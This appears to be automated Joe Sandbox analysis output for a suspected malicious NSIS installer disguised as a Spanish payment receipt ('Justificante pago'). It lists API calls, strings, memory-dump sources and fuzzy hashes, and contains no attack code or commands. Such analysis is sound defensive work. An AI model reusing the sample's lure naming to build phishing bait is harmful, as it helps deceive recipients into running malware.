• Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
• Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
• Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59
APIs
• CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
• CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
• CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
• CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-4010320282
• Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
• Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
• Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
• Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD
APIs
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
• GetMessagePos.USER32 ref: 00404E41
• ScreenToClient.USER32(?,?), ref: 00404E5B
• SendMessageW.USER32(?,00001111,00000000,?), ref: 00404E6D
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404E93
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                                                                                    • String ID: f
                                                                                                                                                                                    • API String ID: 41195575-1993550816
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
• MulDiv.KERNEL32(0010DC95,00000064,?), ref: 00402FDC
• wsprintfW.USER32 ref: 00402FEC
• SetWindowTextW.USER32(?,?), ref: 00402FFC
• SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
Strings
• verifying installer: %d%%, xrefs: 00402FE6
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: verifying installer: %d%%
• API String ID: 1451636040-82062127
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
• GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
• GlobalFree.KERNEL32(?), ref: 00402A06
• GlobalFree.KERNEL32(00000000), ref: 00402A19
• CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
• DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
APIs
• RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
• RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
• RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: CloseEnum$DeleteValue
• String ID:
• API String ID: 1354259210-0
APIs
• GetDlgItem.USER32(?,?), ref: 00401D9A
• GetClientRect.USER32(?,?), ref: 00401DE5
• LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
• SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
• DeleteObject.GDI32(00000000), ref: 00401E39
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: ClientDeleteImageItemLoadMessageObjectRectSend
• String ID:
• API String ID: 1849352358-0
APIs
• GetDC.USER32(?), ref: 00401E51
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
• MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
• ReleaseDC.USER32(?,00000000), ref: 00401E84
  • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
  • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
• CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2584051700-0
                                                                                                                                                                                    • Opcode ID: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                                                                                                                                                                                    • Instruction ID: 4fb721614cfc657e7ae40bea064ac1047d1e810b67000393f6ef8132d91dbde4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 02c220045fa4ce37a47a4a385f421aa4e4c5bbcd39f6b6b3310c1ad1e6cfa2ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: E101D471940651EFEB006BB4AE8ABEA3FB0AF15305F10497AF541B61E2CAB90404DB2C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                                                                                    • String ID: !
                                                                                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                                                                                    • Opcode ID: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                                                                                                                                                    • Instruction ID: 9cc957e5ccccb3d4664e0e2a58dae5c7f5d60dbdf5ff161d76b900271ba72f5e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 63cd3b03ac6125a5c39657f4fd9aa1571fe8c5c2b1a809795ec118cdc527ca65
                                                                                                                                                                                    • Instruction Fuzzy Hash: B9219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                                                                                                                                                                    • wsprintfW.USER32 ref: 00404DBA
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                    • String ID: %u.%u%s%s
                                                                                                                                                                                    • API String ID: 3540041739-3551169577
                                                                                                                                                                                    • Opcode ID: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
                                                                                                                                                                                    • Instruction ID: e9142b657f1eeb4cf11744ba9db0a0194b5dde25e0a765d2a17d7598676c161e
                                                                                                                                                                                    • Opcode Fuzzy Hash: cb7f8dab6708f5147347d1028f1fb4ade6693c058ac397d9bbab0fb1ec6fa22d
                                                                                                                                                                                    • Instruction Fuzzy Hash: E911D8736041283BDB10666D9C45FAE3298DF81338F254237FA25F61D1D978D82182D8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DDC
                                                                                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405DE6
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014), ref: 00405DF8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DD6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                    • API String ID: 2659869361-3081826266
                                                                                                                                                                                    • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                    • Instruction ID: 7ce36c7f15bc9200e130dd8400e4741a81934e97230acaa32a90c98a69430a15
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 09D0A7311019347AC1117B44AC04DDF67ACEE86304381403BF101B70A4CB7C5D518BFD
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • DestroyWindow.USER32(?,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040304A
                                                                                                                                                                                    • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
• Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
• Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
• Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C
APIs
  • Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514
  • Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
  • Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC
• lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
• GetFileAttributesW.KERNEL32(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F47
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: CharNext$AttributesFilelstrcpynlstrlen
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 3248276644-3081826266
• Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
• Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
• Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
• Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE
APIs
• IsWindowVisible.USER32(?), ref: 0040550C
• CallWindowProcW.USER32(?,?,?,?), ref: 0040555D
  • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: Window$CallMessageProcSendVisible
• String ID:
• API String ID: 3748168415-3916222277
• Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
• Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
• Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
• Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A
APIs
• FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
• GlobalFree.KERNEL32(?), ref: 00403B42
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-3081826266
• Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
• Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
• Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
• Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98
APIs
• lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405E28
• CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,C:\Users\user\Desktop\Justificante pago-09453256434687.exe,80000000,00000003), ref: 00405E38
Strings
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-224404859
• Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
• Instruction ID: b9880c769af8d41d832fb6ed8dc33ce50b4fd52cea508e3b62d11b70b6cf9f92
• Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
• Instruction Fuzzy Hash: 98D0A7B3410D20AEC3126B04EC04D9F73ACFF5130078A4427F581A71A4D7785D818EEC
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F84
• CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
• lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
Memory Dump Source
• Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                    • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                    • Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2052974379.00000000009FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009FD000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_9fd000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 31c72f1e8f026e8b3f5eea7003df23894890c97ad4b14b18affa0cb06df957da
                                                                                                                                                                                    • Instruction ID: 974503d16600b438d353630172116e66832be29fa7a874cdb86b7afdb574f285
                                                                                                                                                                                    • Opcode Fuzzy Hash: 31c72f1e8f026e8b3f5eea7003df23894890c97ad4b14b18affa0cb06df957da
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC210076504208DFCF05DF24DAD0B36BFA5EF88314F20C5B9EA094A256C33AD856CB61
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000001.00000002.2059984259.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_70a0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: (fzl$(fzl$4'^q$4'^q$4'^q$4'^q$4wl$4wl$x.kk$x.kk$-kk
                                                                                                                                                                                    • API String ID: 0-1786377780
                                                                                                                                                                                    • Opcode ID: cd72fbf6f8ad30ed30f9cf439160d01109d1e02f54f8f14f92e6d35be267ef20
                                                                                                                                                                                    • Instruction ID: 9f53a58133acbf5a98ac5b7fecf94083659ad84285c2e4a5b1d92167e16c5924
